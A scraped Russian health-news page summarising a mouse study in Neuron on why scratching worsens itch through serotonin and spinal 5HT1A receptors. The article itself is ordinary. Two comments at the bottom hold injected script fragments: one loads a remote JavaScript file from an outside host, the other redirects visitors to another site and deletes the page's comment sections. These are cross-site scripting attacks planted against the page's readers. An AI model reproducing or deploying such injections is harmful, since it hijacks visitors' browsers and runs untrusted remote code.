Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Почему кожа опять чешется...  >>  Почему кожа опять чешется после того, как вы ее почесали?
 
Обратная связь
 

Почему кожа опять чешется после того, как вы ее почесали?

Размер шрифта
15 июня 2015 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Наверняка вы много раз слышали, что не стоит расчесывать зудящие комариные укусы. Ученые подтверждают, что это действительно так: чем больше вы чешетесь, тем больше серотонина вырабатывает ваш мозг, и тем сильнее зуд.

«При чесании кожи всегда возникает незначительная боль», – рассказывает профессор Чжоу-Фенг Чен из Университета Вашингтона, ведущий автор исследования. Боль может пересекаться с зудом, что приводит к тому, что нервные клетки спинного мозга передают в головной мозг болевые сигналы вместо сигналов зуда. «Проблема состоит в том, что когда мозг получает эти болевые сигналы, он начинает вырабатывать серотонин, чтобы контролировать боль», – объясняет Чен. «Однако на уровне спинного мозга серотонин может переходить от нейронов, передающих болевые сигналы, к тем нейронам, которые влияют на интенсивность зуда».

Ученые уже очень давно знают о роли серотонина в процессах контроля болевых ощущений, однако в данной работе впервые анализируется его влияние на зуд. Результаты этой работы, полученные в экспериментах на мышах, были опубликованы в журнале Neuron. Такое же усиление зуда при чесании наблюдается и у человека. Ученые надеются, что дальнейшие исследования помогут им понять, как можно разорвать этот порочный круг, что поможет многим пациентам, страдающим от хронического зуда.

Ученым удалось вывести мышей, у которых отсутствуют гены, отвечающие за выработку серотонина. Когда таким мышам вводили вещество, вызывающее кожный зуд, мыши чесались гораздо меньше, чем их собратья с нормальными генами. «Это соответствует гипотезе о том, что сигналы боли и зуда передаются по разным нейронным путям, которые, однако, могут взаимодействовать друг с другом», – объяснят профессор Чен. «При чесании зуд уменьшается благодаря болевым ощущениям. Но когда организм отвечает на эти болевые сигналы и выделяет серотонин, зуд становится сильнее».

И хотя именно серотонин отвечает за усиление зуда, ученые считают, что лечить зуд путем блокирования выработки серотонина не стоит. Серотонин выполняет в организме множество важных функций. Он участвует в процессах роста, старения, обмена веществ в костях, а также регулирует настроение. К примеру, действие многих антидепрессантов обусловлено их способностью увеличивать уровень серотонина. Блокирование выработки серотонина может привести к серьезным негативным последствиям для всего организма.

Ученые считают, что можно повлиять на процесс взаимодействия серотонина с нейронами спинного мозга, которые отвечают за передачу сигналов зуда. Чену удалось изолировать рецепторы, действуя на которые серотонин активирует эти нейроны – это рецепторы под названием 5HT1A. Выяснилось, что если заблокировать эти рецепторы у мышей, они чешутся гораздо меньше.

«Последовательность действий такова: вы чешетесь, и это вызывает незначительное ощущение боли. Мозг вырабатывает серотонин, чтобы контролировать боль. Однако серотонин не только уменьшает боль, но и активирует определенные нейроны в спинном мозге, действуя на рецепторы 5HT1A, что приводит к усилению зуда», – резюмирует профессор Чен.

А пока ученые разрабатывают новые методики для лечения зуда, единственное, что они могут с уверенностью вам посоветовать, так это меньше чесать зудящие участки кожи – ведь это точно не принесет вам облегчения.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:08

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Почему если почесать, то снова чешется?   Лучшие привычки для молодости мозга   Диета, чтобы не сойти с ума   Запомните на 23% больше с помощью этого простого трюка  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 
10 мая 2013И было у нее три сына: один – умный, второй – глупый, а третий – футболист! Ученые обнаружили связь между футболом и снижением интеллекта 09 мая 2013Как воспитывать ребенка: палка или пряник? Ученые докопались до истины
 

Слайдшоу

1
Мифы и правда о старческом слабоумии
Что сделает вас глупой?
Кто тебя укусил?! Самые опасные насекомые!

Тесты

Возраст мозга
Что вы знаете о депрессии?
Знаете ли вы свой мозг?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.